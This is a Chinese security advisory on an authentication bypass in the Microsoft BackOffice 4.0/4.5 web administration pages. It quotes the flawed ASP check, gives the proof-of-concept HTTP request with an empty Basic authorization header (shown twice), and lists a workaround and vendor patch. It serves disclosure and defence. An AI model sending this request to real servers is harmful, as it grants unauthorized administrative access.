发布日期：2002-04-16
更新日期：2002-04-19

受影响系统：

Microsoft BackOffice 4.0
    - Microsoft Windows NT 4.0
Microsoft BackOffice 4.5
    - Microsoft Windows NT 4.0

描述：

---

BackOffice是一组集成的运行于Windows NT Server 上的服务器应用组件。

BackOffice中的WEB管理ASP页面在处理用户验证时存在漏洞，可导致攻击者无需用户名和密码访问管理页面。

每个BackOffice中的WEB管理ASP页面使用如下代码来进行用户验证：

If Request.ServerVariables("auth_type") = "" Then
  Response.Status = "401 ACCESS DENIED"
  Response.End
End If

上面代码只执行了"authorization/authentication"来进行验证，而使用如下请求可以无需用户名和密码对管理员页面进行访问：

GET /BOADMIN/BackOffice/SERVICES.ASP HTTP/1.1
Host: hostname
Authorization: Basic
[enter]
[enter]

由于上面设置了auth_type变量，所以可以无需认证进行访问。

一般Back Office Web管理接口默认只限制环回接口(127.0.0.1)，所以不能远程进行访问，但也存在管理员设置成可以远程访问的情况。

<*来源：NGSSoftware Insight Security Research （nisr@nextgenss.com）
  
  链接：http://archives.neohapsis.com/archives/bugtraq/2002-04/0208.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

NGSSoftware Insight Security Research （nisr@nextgenss.com）提供了如下测试方法：

GET /BOADMIN/BackOffice/SERVICES.ASP HTTP/1.1
Host: hostname
Authorization: Basic
[enter]
[enter]

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 对Web管理端口设置访问过滤，只允许合法可信的用户访问。

厂商补丁：

Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fdownloads%2frelease.asp%3fReleaseID%3d37717

浏览次数：3205
严重程度：0（网友投票）